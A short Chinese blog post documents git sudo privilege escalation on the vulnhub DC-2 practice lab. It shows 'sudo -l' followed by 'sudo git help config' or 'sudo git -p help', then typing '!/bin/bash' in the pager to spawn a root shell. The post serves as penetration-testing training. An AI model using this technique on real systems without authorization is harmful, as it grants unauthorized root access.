git提权

longersking2024-01-21 23:13

实验环境------vulnhub-dc2靶场

git提权

前提:用户可以使用sudo中git权限

查看sudo权限

bash 复制代码 
sudo -l

可以发现git命令存在sudo提权

基于此进行权限提升

方式:

bash 复制代码 
sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!/bin/bash

然后按q退出,再输出sudo git -p help命令,同上输入!/bin/bash

...(img-S18YuqYP-1705661673078)]

相关推荐
恋喵大鲤鱼2 小时前
git rebase
git·git rebase
大志哥1236 小时前
idea+git插件+云备份实现项目新分支新建维护
git
恋喵大鲤鱼7 小时前
git merge
git·git merge
码客日记7 小时前
Spring Boot 配置文件敏感信息加密(Jasypt 企业级完整方案)
java·spring boot·git
_codemonster7 小时前
Codex 核心进阶玩法(技能/MCP/派生/分叉/Git/钩子/子智能体)
git
逻极8 小时前
Git 从入门到精通:版本控制协作实战指南
git·github·分支管理·版本控制
恋喵大鲤鱼8 小时前
git clean
git·git clean
Patrick_Wilson8 小时前
为省一次回归测试,该不该把多个改动堆进一条分支?
git·ci/cd·架构
恋喵大鲤鱼9 小时前
git blame
git·git blame
yeflx9 小时前
Git操作
git
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch 下载、安装与使用配置指南【2026.5.29】09AI科技热点日报 | 2026年6月1日10CC-Switch & Claude 基于 Linux 服务器安装使用指南